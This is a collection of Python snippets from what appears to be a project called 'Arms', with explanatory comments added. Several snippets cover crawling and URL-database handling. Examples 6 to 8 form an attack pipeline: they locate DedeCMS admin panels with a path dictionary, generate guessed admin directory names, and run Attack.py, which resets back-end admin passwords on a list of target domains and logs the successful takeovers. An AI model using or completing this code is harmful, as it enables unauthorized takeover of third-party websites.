Example #1
from common import utils    # import paths assumed from Example #7
from unit import dbsqlite


def load_url_txt():
    """Load seed URLs from a text file into the DB, skipping duplicates."""
    path = './res/注册成功'  # list of "registration succeeded" URLs
    lines = utils.get_lines(path)  # renamed from `list`, which shadowed the builtin
    for url in lines:
        if dbsqlite.data_select(url):  # already stored
            continue
        dbsqlite.data_insert(url)
    print('Imported %d seed records' % len(lines))
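
Every example reads its input through utils.get_lines, which is never shown in these snippets. A minimal sketch of what it likely does (an assumption, not the project's actual helper):

# Hypothetical sketch of utils.get_lines: return a file's non-empty lines,
# stripped of surrounding whitespace.
def get_lines(path, encoding='utf-8'):
    with open(path, encoding=encoding) as fp:
        return [line.strip() for line in fp if line.strip()]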
Example #2
def load_url_txt():
    # Imports as in Example #1 (common.utils, unit.dbsqlite).
    try:
        path = './dict/导入采集种子'  # crawl-seed import list
        lines = utils.get_lines(path)  # renamed from `list`, which shadowed the builtin
        for url in lines:
            url = 'http://www.' + url
            # Dedup check disabled in the original:
            # if dbsqlite.data_select(url):
            #     continue
            dbsqlite.data_insert(url)
        print('Imported %d seed records' % len(lines))
    except Exception as e:
        print(e)
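
The dbsqlite helpers (data_select, data_insert, and friends) come from the project's unit package and are not shown either. A minimal sqlite3 sketch of the two calls the loaders use; the table name and schema are assumptions:

import sqlite3

# Hypothetical sketch of unit/dbsqlite: a single-table URL store.
_conn = sqlite3.connect('urls.db')
_conn.execute('CREATE TABLE IF NOT EXISTS urls (url TEXT PRIMARY KEY)')

def data_select(url):
    # True if the URL is already stored
    return _conn.execute('SELECT 1 FROM urls WHERE url = ?',
                         (url,)).fetchone() is not None

def data_insert(url):
    _conn.execute('INSERT OR IGNORE INTO urls (url) VALUES (?)', (url,))
    _conn.commit()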
Example #3
import re
import time

from common import utils    # import paths assumed from Example #7
from unit import dbsqlite


def crawling(i):
    while True:
        try:
            # Filter words, e.g. ['银行', '政府', '管理', '内容', '系统']
            path = './dict/采集标题过滤字典.txt'  # title-filter dictionary
            title_words = utils.get_lines(path)
            rows = dbsqlite.data_getlist(' is_crawl = 0 limit 1')
            if not rows:
                # The original indexed [0] before this check, which raises
                # IndexError on an empty result instead of reaching it.
                print('Thread %d: no crawl source found, waiting 3s' % i)
                time.sleep(3)
                continue
            url = rows[0][1]
            print('Thread %d: %s' % (i, url))
            response = utils.my_requests(url)  # the original called my_requests bare; qualified for consistency
            if response:
                response.encoding = response.apparent_encoding
                titles = re.findall('<title>(.+)</title>', response.text)
                title = titles[0] if titles else ''  # guard against pages with no <title>
                if any(each in title for each in title_words):
                    # Caution: title is interpolated into SQL unescaped.
                    dbsqlite.data_update(url,
                                         "title = '%s',status = 1" % title)
                    continue
                else:
                    dbsqlite.data_update(url, "title = '%s'" % title)
                urllist = getUrllist(response.text, url)
                print('%s friend links: %d' % (url, len(urllist)))
                for curl in urllist:
                    # s = urllib.parse.urlparse(url).netloc
                    try:
                        res = utils.my_requests(url=curl,
                                                try_count=1,
                                                timeout=10)
                        if res:
                            curl = utils.format_domain(res.url, protocol=True)
                        else:
                            continue
                    except Exception:
                        continue
                    if dbsqlite.data_select(curl):
                        continue
                    dbsqlite.data_insert(curl)
            else:
                dbsqlite.data_update(url, 'status = 1')
        except Exception as e:
            print(e)
            continue
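
getUrllist is referenced above but never defined. A regex-based stand-in that collects href targets and resolves relative links against the page URL (an assumption about what the real helper does):

import re
from urllib.parse import urljoin

# Hypothetical sketch of getUrllist: pull href targets out of raw HTML and
# resolve them against the page's own URL.
def getUrllist(html, base_url):
    links = re.findall(r'href=["\'](.*?)["\']', html)
    return [urljoin(base_url, link) for link in links
            if not link.startswith(('javascript:', '#', 'mailto:'))]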
Example #4
import json
import traceback

from common import utils    # import paths assumed from Example #7

my_key = '******'  # aizhan API key; defined elsewhere in the original project


def bash_select_weight():
    domains = list(utils.get_lines("查权重"))  # "query weight" input list
    ress = {}
    domains_g = utils.group_by_list(domains, 50)  # batch the API calls, 50 domains each
    for group in domains_g:  # renamed: the original reused `domains` here
        try:
            aizhan_api = "https://apistore.aizhan.com/baidurank/siteinfos/%s?domains=%s"
            res = utils.my_requests(
                aizhan_api % (my_key, "|".join(group).replace(
                    "https://", "").replace("http://", "")))
            for data in json.loads(res.text)["data"]["success"]:
                ress.update({data["domain"]: data["pc_br"]})
        except Exception:
            traceback.print_exc()
    ress = sorted(ress.items(), key=lambda d: d[1], reverse=True)
    with open(file="./res/权重", mode="a") as fp:  # "weight" results file
        for domain, weight in ress:
            # The original wrote "\nd%s|%s"; the stray "d" looks like a typo.
            fp.write("\n%s|%s" % (domain, weight))
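
utils.group_by_list is another unshown helper; from its use above it splits a list into fixed-size batches for the API. A minimal sketch under that reading:

# Hypothetical sketch of utils.group_by_list: consecutive groups of at most
# `size` elements.
def group_by_list(items, size):
    return [items[i:i + size] for i in range(0, len(items), size)]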
Example #5
# The snippet starts mid-function; the signature is inferable from the call
# sites below: def 注册(domain, num=3), where 注册 means "register".
    if res:
        return True
    elif num > 0:
        print("Retrying registration: " + domain)
        return 注册(domain, num - 1)  # recurse with one fewer attempt
    return False  # retries exhausted; the original fell through and returned None


def main():
    while True:
        # get domain
        domain = ""
        res = 注册(domain=domain)
        # store the result in the database


if __name__ == "__main__":
    domains = utils.get_lines("./验证注册")  # "verify registration" input list
    for domain in domains:
        try:
            print(domain)
            res = 注册(domain, 3)
            with open("注册结果", "a") as f:  # "registration results" log
                if res:
                    f.write(domain + '----registration succeeded\n')
                else:
                    f.write(domain + '----registration failed\n')
        except Exception:
            traceback.print_exc()
            with open("注册结果", "a") as f:
                f.write(domain + '----registration failed\n')
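
Example #5 retries by recursing with num - 1; utils.my_requests, called in Examples #3 and #4 with try_count and timeout, presumably loops the same way. A sketch under that assumption:

import requests

# Hypothetical sketch of utils.my_requests: a GET wrapper that retries up to
# try_count times and returns None instead of raising on failure.
def my_requests(url, try_count=3, timeout=10, **kwargs):
    for _ in range(try_count):
        try:
            res = requests.get(url, timeout=timeout, **kwargs)
            if res.status_code == 200:
                return res
        except requests.RequestException:
            continue
    return None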
Example #6
File: Attack.py  Project: xrq1996/Arms
                    "domain": self.domain,
                    "res": False,
                    "info": "failed to update back-end admin password"
                }
        res = self.reset_back_admin()
        return res


def attack(domain, back_ground_url):
    domain = utils.format_domain(domain, True)
    atk = Attack(domain=domain,
                 user="******",
                 pwd="qwe123",
                 back_ground_url=back_ground_url)
    res = atk.start()
    str_res = "domain:%s, info:%s" % (res["domain"], res["info"])
    print(str_res)
    if res["res"]:
        with open(file="./res/重置结果.txt", mode="a", encoding="utf-8") as fp:
            fp.write(str_res + "\n")


if __name__ == '__main__':
    domains_info = utils.get_lines("./target/重置列表")  # "reset list" targets
    with open(file="./res/重置结果.txt", mode="a", encoding="utf-8") as fp:
        fp.write("\n\nReset results|%s\n" %
                 time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()))
    for line in domains_info:
        parts = line.split("|")
        # Original bug: it compared the split list itself to 1; the intent is
        # "no explicit back-end path given", falling back to the default "后台".
        bk = "后台" if len(parts) == 1 else parts[1]
        attack(domain=parts[0], back_ground_url=bk)
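
attack() above and the crawler in Example #3 both normalize input with utils.format_domain(domain, True). One plausible reading, using the tldextract package that Example #7 imports (the exact behavior is an assumption):

import tldextract

# Hypothetical sketch of utils.format_domain: reduce a URL to its host name,
# optionally prefixing a scheme when protocol=True.
def format_domain(url, protocol=False):
    ext = tldextract.extract(url)
    host = '.'.join(p for p in (ext.subdomain, ext.domain, ext.suffix) if p)
    return 'http://' + host if protocol else host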
Example #7
# -*- coding: utf-8 -*-
# Step 4: locate the back-end (admin) URL
#     status:
#         6: found
#         7: not found --- a separate program probes the back end and sets
#            status to 6 on success, 8 on failure

import traceback
from common import utils
import threading
import requests
from threading import Thread
import time
import tldextract
from unit import dbsqlite

base_back_dict = utils.get_lines("./dict/织梦后台字典.txt")  # DedeCMS ("织梦") back-end path dictionary
min_group = 0
thread_num = 1
R = threading.Lock()


def get_domains(status, num=1):
    try:
        R.acquire()
        print("Fetching data")
        domains = dbsqlite.start_getlist(' status = %s limit %d' %
                                         (status, num))
        if len(domains) < min_group:
            # Caution: R is still held on this early return unless it is
            # released further down (the snippet is truncated).
            return
        d_str = []
        for domain in domains:
Example #8
import itertools
import traceback
from common import utils
from threading import Thread
import time
import re

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
base_back_dict = utils.get_lines("./dict/织梦后台字典.txt")  # DedeCMS ("织梦") back-end path dictionary


def try_common(domain):
    """Derive candidate back-end directory names from the domain's first label."""
    back_dir_dict = []
    s = domain.replace("http://", "").replace("https://", "")
    n = len(s.split("."))
    if n == 2:
        path = s.split(".")[0]
        back_dir_dict = [
            path,
            "admin_%s" % path,
            "dede_%s" % path,
            "ad_%s" % path,
            "bk_%s" % path,
            "background_%s" % path,
            "houtai_%s" % path,
            "%s_admin" % path,
            "%s_dede" % path,
            "%s_ad" % path,
            "%s_bk" % path,
            "%s_background" % path,
            "%s_houtai" % path